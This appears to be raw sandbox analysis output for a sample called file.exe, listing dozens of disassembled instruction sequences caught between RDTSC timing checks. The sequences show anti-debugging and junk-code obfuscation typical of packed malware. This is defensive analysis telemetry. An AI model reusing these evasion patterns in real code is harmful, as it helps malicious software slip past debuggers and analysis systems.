Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AACEE0 second address: AACF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B322h 0x00000009 popad 0x0000000a push eax 0x0000000b jno 00007F4DA4C5B320h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F4DA4C5B318h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007F4DA4C5B31Fh 0x00000031 clc 0x00000032 push 00000000h 0x00000034 call 00007F4DA4C5B327h 0x00000039 push eax 0x0000003a pop ebx 0x0000003b pop ebx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F4DA4C5B318h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 call 00007F4DA4C5B322h 0x0000005d or dword ptr [ebp+122D22ABh], edi 0x00000063 pop edi 0x00000064 xchg eax, esi 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AACF95 second address: AACF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AACF99 second address: AACFB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B323h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AADE3E second address: AADEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 js 00007F4DA4C5D850h 0x0000000e jmp 00007F4DA4C5D84Ah 0x00000013 jmp 00007F4DA4C5D857h 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F4DA4C5D848h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 jmp 00007F4DA4C5D850h 0x00000039 or ebx, dword ptr [ebp+122D35CDh] 0x0000003f push 00000000h 0x00000041 adc bh, FFFFFFFEh 0x00000044 push 00000000h 0x00000046 sub dword ptr [ebp+122D222Ah], ebx 0x0000004c xchg eax, esi 0x0000004d push ebx 0x0000004e jl 00007F4DA4C5D85Eh 0x00000054 jmp 00007F4DA4C5D858h 0x00000059 pop ebx 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push edx 0x0000005f pop edx 0x00000060 jmp 00007F4DA4C5D854h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AADEEF second address: AADEFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5B31Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAD0B9 second address: AAD0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAD0BD second address: AAD0C7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4DA4C5B316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAD196 second address: AAD1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4DA4C5D846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF02F second address: AAF03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4DA4C5B316h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB73E8 second address: AB73EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB73EE second address: AB73F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB73F3 second address: AB73FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4DA4C5D846h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A54322 second address: A54337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Bh 0x00000007 jp 00007F4DA4C5B316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A54337 second address: A5433C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5433C second address: A54353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B31Dh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A61817 second address: A6181B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4B5F second address: AC4B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4B67 second address: AC4B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4B6B second address: AC4B7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F4DA4C5B31Eh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4B7D second address: AC4B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4B87 second address: AC4B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5281E second address: A52834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnp 00007F4DA4C5D846h 0x0000000c jmp 00007F4DA4C5D84Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC386D second address: AC3885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4DA4C5B31Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC3885 second address: AC3889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC3E71 second address: AC3E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC3E77 second address: AC3E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4DA4C5D854h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC3E93 second address: AC3E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC3E99 second address: AC3EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4DA4C5D846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC415D second address: AC4166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4166 second address: AC416A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC416A second address: AC416E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC42C4 second address: AC42CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC45C1 second address: AC45C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC45C7 second address: AC45E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4DA4C5D850h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC45E0 second address: AC4600 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4DA4C5B326h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4600 second address: AC4604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E4B6 second address: A9E4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E4BA second address: A9E530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jbe 00007F4DA4C5D846h 0x00000010 jmp 00007F4DA4C5D856h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F4DA4C5D857h 0x0000001c jmp 00007F4DA4C5D850h 0x00000021 popad 0x00000022 popad 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 push edi 0x00000028 jnl 00007F4DA4C5D848h 0x0000002e pop edi 0x0000002f mov eax, dword ptr [eax] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F4DA4C5D853h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E530 second address: A9E535 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E6EB second address: A9E716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F4DA4C5D846h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], esi 0x00000014 jnc 00007F4DA4C5D84Ch 0x0000001a sub dword ptr [ebp+122D1B0Ch], ecx 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jns 00007F4DA4C5D84Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E716 second address: A9E71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E71A second address: A9E762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F4DA4C5D858h 0x00000010 pushad 0x00000011 jmp 00007F4DA4C5D858h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E8C3 second address: A9E8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E9CC second address: A9E9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9F23D second address: A7D983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F4DA4C5B318h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D220Ch], ecx 0x00000027 call dword ptr [ebp+122D2C0Eh] 0x0000002d pushad 0x0000002e jmp 00007F4DA4C5B31Fh 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7D983 second address: A7D987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4F334 second address: A4F339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4F339 second address: A4F34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4DA4C5D846h 0x0000000a popad 0x0000000b push esi 0x0000000c jne 00007F4DA4C5D846h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4F34D second address: A4F36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jmp 00007F4DA4C5B31Ch 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC9065 second address: AC9075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F4DA4C5D846h 0x0000000a jl 00007F4DA4C5D846h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC91CA second address: AC91DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F4DA4C5B316h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC9357 second address: AC935C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC9753 second address: AC97A0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4DA4C5B316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F4DA4C5B327h 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pushad 0x00000015 jmp 00007F4DA4C5B325h 0x0000001a jmp 00007F4DA4C5B31Ch 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD2A70 second address: AD2A9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D855h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4DA4C5D84Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD2A9A second address: AD2A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD2A9E second address: AD2AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD2AA2 second address: AD2AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5B31Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jc 00007F4DA4C5B316h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD2AC2 second address: AD2AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD17F1 second address: AD17F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD17F5 second address: AD17F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD1946 second address: AD197A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4DA4C5B31Eh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4DA4C5B326h 0x00000014 jne 00007F4DA4C5B316h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD197A second address: AD1986 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4DA4C5D846h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD1986 second address: AD1995 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4DA4C5B318h 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD1523 second address: AD1527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD1527 second address: AD152B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD152B second address: AD1531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD1531 second address: AD1539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD1539 second address: AD153D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD22A9 second address: AD22E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B320h 0x00000007 jmp 00007F4DA4C5B31Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4DA4C5B324h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD22E2 second address: AD22EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007F4DA4C5D846h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD22EE second address: AD2318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F4DA4C5B327h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jne 00007F4DA4C5B31Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA130 second address: ADA137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA137 second address: ADA13F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA292 second address: ADA299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA299 second address: ADA29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA3C9 second address: ADA3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnp 00007F4DA4C5D846h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA3D5 second address: ADA3DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADA6BB second address: ADA6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007F4DA4C5D848h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F4DA4C5D84Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADAF9E second address: ADAFA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9DF9 second address: AD9E48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D857h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F4DA4C5D84Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007F4DA4C5D852h 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4DA4C5D852h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9E48 second address: AD9E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9E4C second address: AD9E52 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD9E52 second address: AD9E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A593F8 second address: A59402 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4DA4C5D846h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADE1A4 second address: ADE1A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADE1A8 second address: ADE1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F4DA4C5D846h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADE1B8 second address: ADE1BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE0BFB second address: AE0C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4DA4C5D851h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE082A second address: AE0830 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE59BA second address: AE59BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE5B7C second address: AE5BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4DA4C5B316h 0x0000000a popad 0x0000000b jnp 00007F4DA4C5B318h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F4DA4C5B325h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F4DA4C5B327h 0x00000021 ja 00007F4DA4C5B318h 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
